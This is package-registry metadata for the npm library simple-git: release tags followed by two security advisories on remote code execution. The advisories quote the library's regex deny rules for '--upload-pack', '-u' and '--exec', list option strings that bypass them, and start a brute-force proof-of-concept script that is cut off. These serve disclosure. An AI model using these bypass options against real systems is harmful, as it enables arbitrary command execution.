":"2016-01-03T15:50:55.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.19.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.19.0/manifests"},{"name":"1.18.0","sha":"7bf07491244cc46ddb9cfa9741dd54dd59e68aad","kind":"tag","published_at":"2015-12-21T22:02:44.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.18.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.18.0/manifests"},{"name":"1.17.0","sha":"fcc92d754ab3cdacb3e98e6f17bc845894aeb9fc","kind":"tag","published_at":"2015-12-10T17:19:28.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.17.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.17.0/manifests"},{"name":"1.16.0","sha":"b4dcc66ced4f1058ab174214f47b8eb61f86c6ee","kind":"tag","published_at":"2015-12-02T17:00:39.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.16.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.16.0/manifests"},{"name":"1.15.0","sha":"9daca46d4b826fbe2f558f67872cf6047becff17","kind":"tag","published_at":"2015-12-01T20:22:30.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.15.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.15.0/manifests"},{"name":"1.14.0","sha":"8274b1d5ff6945f59afebef7a7cf5eddfa2340cc","kind":"tag","published_at":"2015-11-28T15:44:02.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.14.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.14.0/manifests"},{"name":"1.13.0","sha":"389c9888f81ac6740dd204c9e623d134c0f669ef","kind":"tag","published_at":"2015-11-28T14:33:55.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.13.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.13.0/manifests"},{"name":"1.12.0","sha":"83f3f60d5899116fe4d38b9109c9d925963856da","kind":"tag","published_at":"2015-11-19T22:03:45.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.12.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.12.0/manifests"},{"name":"1.11.0","sha":"f2f915da75aa6b2a95c6b9bb6b11263154410a05","kind":"tag","published_at":"2015-10-12T21:01:02.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.11.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.11.0/manifests"},{"name":"1.10.0","sha":"c2fa618b147530e65ded5ab627b309174cc54c7e","kind":"tag","published_at":"2015-09-26T08:33:49.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.10.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.10.0/manifests"},{"name":"1.9.0","sha":"8f30038fb05b7c5a11b2277acee2de09f546ccd2","kind":"tag","published_at":"2015-09-24T09:09:36.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.9.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.9.0/manifests"},{"name":"1.8.0","sha":"35074f57a4b2c4dff58f31d16fa1b47d1e87034a","kind":"tag","published_at":"2015-08-26T08:13:15.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.8.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.8.0/manifests"},{"name":"1.7.0","sha":"59433993bc71402c98be54d076f2771d96b52663","kind":"tag","published_at":"2015-08-04T21:07:45.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.7.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.7.0/manifests"},{"name":"1.6.0","sha":"2b2dba2fc309fe25ea8c675317611d8caf1974cb","kind":"tag","published_at":"2015-07-16T18:38:25.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.6.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.6.0/manifests"},{"name":"tagged","sha":"37041c099d36fcd5ee4d73a19c8f7e2629ca3d9a","kind":"commit","published_at":"2015-07-12T13:36:46.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/tagged","html_url":"https://github.com/steveukx/git-js/releases/tag/tagged","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@tagged","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/tagged","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/tagged/manifests"},{"name":"1.5.0","sha":"f719fa53996930fd5d310ca050df866c9f8e8c07","kind":"tag","published_at":"2015-07-12T13:30:21.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.5.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.5.0/manifests"},{"name":"1.4.0","sha":"b632f62bea13e39590954082f626f9f9c61acca5","kind":"tag","published_at":"2015-07-12T13:25:43.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.4.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.4.0/manifests"},{"name":"1.3.0","sha":"d9f8931c2d65312df322edf912fa1c2fbcd23881","kind":"tag","published_at":"2015-04-24T16:27:52.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.3.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.3.0/manifests"},{"name":"1.2.0","sha":"b4ac1548f10b1c7da0cfb31f362078d521a250dd","kind":"tag","published_at":"2015-04-09T04:53:17.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.2.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.2.0/manifests"},{"name":"1.1.0","sha":"53f0e8f8ca5b4894370b7d0b9521b5cefb9fffef","kind":"tag","published_at":"2015-04-07T20:18:07.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.1.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.1.0/manifests"},{"name":"1.0.0","sha":"cc6cf684b9eb0d0758d3ac93f0fa8b704f3c994f","kind":"tag","published_at":"2015-04-02T08:17:05.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.0.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.0.0/manifests"},{"name":"0.17.0","sha":"5c2e47e423ffe02d5b7f2cf314d70c1fc5d1b235","kind":"tag","published_at":"2015-03-18T07:45:54.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/0.17.0","html_url":"https://github.com/steveukx/git-js/releases/tag/0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.17.0/manifests"},{"name":"0.16.0","sha":"2438f8e32eb643f248311957d69ad2104b71752a","kind":"tag","published_at":"2015-03-17T06:22:39.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/0.16.0","html_url":"https://github.com/steveukx/git-js/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"0cc8ad7030d925c532f6db14438ee7bd7d298c78","kind":"tag","published_at":"2015-03-16T18:03:59.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/0.15.0","html_url":"https://github.com/steveukx/git-js/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.15.0/manifests"},{"name":"0.14.0","sha":"8c8e4bee40da14f12d19a0c6dd5add4b9dd5c5ec","kind":"tag","published_at":"2015-01-08T09:44:02.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/0.14.0","html_url":"https://github.com/steveukx/git-js/releases/tag/0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.14.0/manifests"},{"name":"0.13.0","sha":"c2cc8f4c8872e920b3247e7489da6d6259c00f52","kind":"tag","published_at":"2014-12-31T05:59:07.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/0.13.0","html_url":"https://github.com/steveukx/git-js/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"55231ac56419ec4cf36f473c65ae712ad0cc8c51","kind":"tag","published_at":"2014-12-13T19:28:32.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/0.12.0","html_url":"https://github.com/steveukx/git-js/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"98f07be8fe6dd889a0deefdb479f910bc34e8360","kind":"tag","published_at":"2014-12-08T20:21:28.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/0.11.0","html_url":"https://github.com/steveukx/git-js/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.11.0/manifests"},{"name":"0.10.0","sha":"39336e00c5f4d5464ad5e54900badf76219320b9","kind":"tag","published_at":"2014-06-22T09:41:21.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/0.10.0","html_url":"https://github.com/steveukx/git-js/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.10.0/manifests"},{"name":"0.9.0","sha":"c2f046f546b65d485f5ed7853b00dc94d3f779a3","kind":"tag","published_at":"2014-06-22T09:19:53.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/0.9.0","html_url":"https://github.com/steveukx/git-js/releases/tag/0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.9.0/manifests"},{"name":"0.8.0","sha":"011179289e53d24449fe80377c5d2400464f736b","kind":"tag","published_at":"2014-06-08T21:19:16.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/0.8.0","html_url":"https://github.com/steveukx/git-js/releases/tag/0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.8.0/manifests"},{"name":"0.7.0","sha":"d6056371ee9baa91b8d1cfdc7e681fe37ddf663d","kind":"tag","published_at":"2014-03-15T20:08:04.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/0.7.0","html_url":"https://github.com/steveukx/git-js/releases/tag/0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.7.0/manifests"},{"name":"0.6.0","sha":"66ece58f33bfba9250416f1cde52244aa17be8c9","kind":"tag","published_at":"2014-02-11T20:32:31.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/0.6.0","html_url":"https://github.com/steveukx/git-js/releases/tag/0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.6.0/manifests"},{"name":"0.5.0","sha":"4efba559cc9dbc06d18644148bd3bc25fa9ff399","kind":"tag","published_at":"2014-01-11T07:44:25.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/0.5.0","html_url":"https://github.com/steveukx/git-js/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"bad7622ebe8556a718d88ef5a78775441edf77b4","kind":"tag","published_at":"2013-12-08T19:25:52.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/0.4.0","html_url":"https://github.com/steveukx/git-js/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.4.0/manifests"},{"name":"0.3.0","sha":"29ef26ea415bc1dba92a5b9e0ee2847e115b95b8","kind":"tag","published_at":"2013-11-26T19:11:08.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/0.3.0","html_url":"https://github.com/steveukx/git-js/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.3.0/manifests"},{"name":"0.2.0","sha":"a1f696f2bdcbf81e2e8265aa6380620ecba0b126","kind":"tag","published_at":"2013-09-30T12:50:05.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/0.2.0","html_url":"https://github.com/steveukx/git-js/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.2.0/manifests"},{"name":"0.1.0","sha":"502e0a80b92be95bdb90b3fde28a0a3368533fe7","kind":"tag","published_at":"2013-08-24T10:12:15.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/0.1.0","html_url":"https://github.com/steveukx/git-js/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2026-06-03T14:55:57.532Z","dependent_packages_count":4498,"downloads":42186783,"downloads_period":"last-month","dependent_repos_count":93771,"rankings":{"downloads":0.07948234428359531,"dependent_repos_count":0.10937805424921525,"dependent_packages_count":0.021185709850636433,"stargazers_count":1.6289712426266831,"forks_count":2.0371516084825187,"docker_downloads_count":0.10995297174855408,"average":0.6643536552068672},"purl":"pkg:npm/simple-git","advisories":[{"uuid":"GSA_kwCzR0hTQS1oZmZtLXh2YzMtdnByY84ABVxT","url":"https://github.com/advisories/GHSA-hffm-xvc3-vprc","title":"simple-git is vulnerable to Remote Code Execution","description":"Versions of the package simple-git before 3.36.0 are vulnerable to Remote Code Execution (RCE) due to an incomplete fix for [CVE-2022-25912](https://security.snyk.io/vuln/SNYK-JS-SIMPLEGIT-3112221) that blocks the -c option but not the equivalent --config form. If untrusted input can reach the options argument passed to simple-git, an attacker may still achieve remote code execution by enabling protocol.ext.allow=always and using an ext:: clone source.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-04-25T06:30:23.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.2,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P","references":["https://nvd.nist.gov/vuln/detail/CVE-2026-6951","https://github.com/steveukx/git-js/commit/89a2294febed5dfe737c4c735d936bb6018746a8","https://gist.github.com/KKC73/02d1d97f3410756095b501fda0ac8ca6","https://security.snyk.io/vuln/SNYK-JS-SIMPLEGIT-15456078","https://github.com/advisories/GHSA-hffm-xvc3-vprc"],"source_kind":"github","identifiers":["GHSA-hffm-xvc3-vprc","CVE-2026-6951"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-05T21:00:09.283Z","updated_at":"2026-05-28T19:01:02.208Z","epss_percentage":0.00157,"epss_percentile":0.36097,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oZmZtLXh2YzMtdnByY84ABVxT","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oZmZtLXh2YzMtdnByY84ABVxT","packages":[{"ecosystem":"npm","package_name":"simple-git","versions":[{"first_patched_version":"3.36.0","vulnerable_version_range":"\u003c 3.36.0"}],"purl":"pkg:npm/simple-git"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oZmZtLXh2YzMtdnByY84ABVxT/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qY3htLW0zangtZjI4N84ABVLG","url":"https://github.com/advisories/GHSA-jcxm-m3jx-f287","title":"simple-git Affected by Command Execution via Option-Parsing Bypass","description":"### Summary\n\nsimple-git enables running native Git commands from JavaScript. Some commands accept options that allow executing another command; because this is very dangerous, execution is denied unless the user explicitly allows it. This vulnerability allows a malicious actor who can control the options to execute other commands even in a “safe” state where the user has not explicitly allowed them. The vulnerability was introduced by an incorrect patch for CVE-2022-25860. It is *likely* to affect all versions prior to and including 3.28.0.\n\n\n### Detail\n\nThis vulnerability was introduced by an incorrect patch for CVE-2022-25860.\n\nIt was reproduced in the following environment:\n\n```\n\nWSL Docker\nnode: v22.19.0\ngit: git version 2.39.5\nsimple-git: 3.28.0\n\n````\n\nThe issue was not reproduced on Windows 11.\n\nThe `-u` option, like `--upload-pack`, allows a command to be executed.\n\nCurrently, the `-u` and `--upload-pack` options are blocked in the file `simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts`.\n\n```ts\nfunction preventUploadPack(arg: string, method: string) {\n   if (/^\\s*--(upload|receive)-pack/.test(arg)) {\n      throw new GitPluginError(\n         undefined,\n         'unsafe',\n         `Use of --upload-pack or --receive-pack is not permitted without enabling allowUnsafePack`\n      );\n   }\n\n   if (method === 'clone' \u0026\u0026 /^\\s*-u\\b/.test(arg)) {\n      throw new GitPluginError(\n         undefined,\n         'unsafe',\n         `Use of clone with option -u is not permitted without enabling allowUnsafePack`\n      );\n   }\n\n   if (method === 'push' \u0026\u0026 /^\\s*--exec\\b/.test(arg)) {\n      throw new GitPluginError(\n         undefined,\n         'unsafe',\n         `Use of push with option --exec is not permitted without enabling allowUnsafePack`\n      );\n   }\n}\n````\n\nHowever, the problem is that command option parsing is quite flexible.\n\nBy brute forcing, I found various options that bypass the `-u` check.\n\n```\n[\n  '--u', '--u',\n  '-4u', '-6u',\n  '-lu', '-nu',\n  '-qu', '-su',\n  '-vu'\n]\n```\n\nAll of the above are three-character options that allow command execution. They enable execution even when `allowUnsafePack` is explicitly set to false.\n\nThe depressing fact is that the options I found are probably only a tiny fraction of all possible option formats that enable command execution. In addition to the `-u` option, there is also the `--upload-pack` option and others, and some of the options I found can probably be extended to arbitrary length. Considering this, the number of option variants that enable command execution is probably infinite.\n\nTherefore, I could not find an effective way to block all such cases. Personally, I think it is virtually impossible to block this vulnerability completely. To fully block it, one would have to faithfully emulate Git’s option parsing rules, and it’s doubtful whether that is feasible.\n\nJust in case, I’ll share the brute-force code I used to find options that enable command execution.\n\n```js\nconst fs = require('fs');\nconst simpleGit = require('simple-git');\n\nconst TMP_DIR = './pwned/';\nconst ITER = 256;\n\nfunction cleanTmpDir() {\n    if (fs.existsSync(TMP_DIR)) {\n        fs.rmSync(TMP_DIR, { recursive: true, force: true });\n    }\n    fs.mkdirSync(TMP_DIR, { recursive: true });\n}\n\nfunction getPwnedFiles() {\n    const found = [];\n    for (let i = 0; i \u003c ITER; i++) {\n        const fname1 = `${TMP_DIR}1_${i}`;\n        const fname2 = `${TMP_DIR}2_${i}`;\n        const fname3 = `${TMP_DIR}3_${i}`;\n        if (fs.existsSync(fname1)) found.push(String.fromCharCode(i) + '-u');\n        if (fs.existsSync(fname2)) found.push('-' + String.fromCharCode(i) + 'u');\n        if (fs.existsSync(fname3)) found.push('-u' + String.fromCharCode(i));\n    }\n    return found;\n}\n\nasync function runTest(runIdx) {\n    const git = simpleGit();\n    // 1. `${~}-u` Pattern\n    for (let i = 0; i \u003c ITER; i++) {\n        try {\n            await 